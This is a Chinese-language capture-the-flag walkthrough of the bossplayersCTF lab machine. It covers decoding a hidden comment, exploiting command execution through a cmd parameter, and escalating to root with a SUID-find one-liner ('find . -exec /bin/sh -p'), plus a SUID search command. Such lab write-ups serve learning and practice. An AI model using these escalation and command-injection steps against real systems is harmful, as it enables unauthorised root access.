• 渗透靶机bossplayersCTF


    信息收集

    确定靶机ip地址(前面就确定了,这里省略)和开放的服务

    漏洞挖掘

    可见开放了ssh和http,访问http看看,前端代码查看得到

    <!--WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK-->
    

    三次base64解密得到的:workinginprogress.php

    访问看看

    发现提示信息,可能存在命令执行,尝试?cmd=pwd

    确实有命令执行

    漏洞利用

    直接反弹shell

    提权

    python模块得到标准格式:python -c 'import pty;pty.spawn("/bin/bash")'

    查找suid权限的可执行文件

    find / -perm -u=s -type f 2>/dev/null
    

    发现find有这个权限,直接提权

    find . -exec /bin/sh -p \; -quit
    

    后渗透

    然后到/root目录,发现robots.txt,将其内容base64解码,通关

    注意

    本文章内容仅限于交流学习,不可利用其中的方法进行非法行为,否则后果自负!!!

  • 相关阅读:
    Python之正则表达式模块
    Python之装饰器复习
    Django请求生命周期之响应内容
    网络编程
    Django实现验证码
    JSONP跨域请求
    原生Ajax(XMLHttpRequest)
    JavaScript函数与面向对象
    JavaScript作用域
    Django之Model操作
  • 原文地址:https://www.cnblogs.com/crfshadow/p/14187100.html
Copyright © 2020-2023  润新知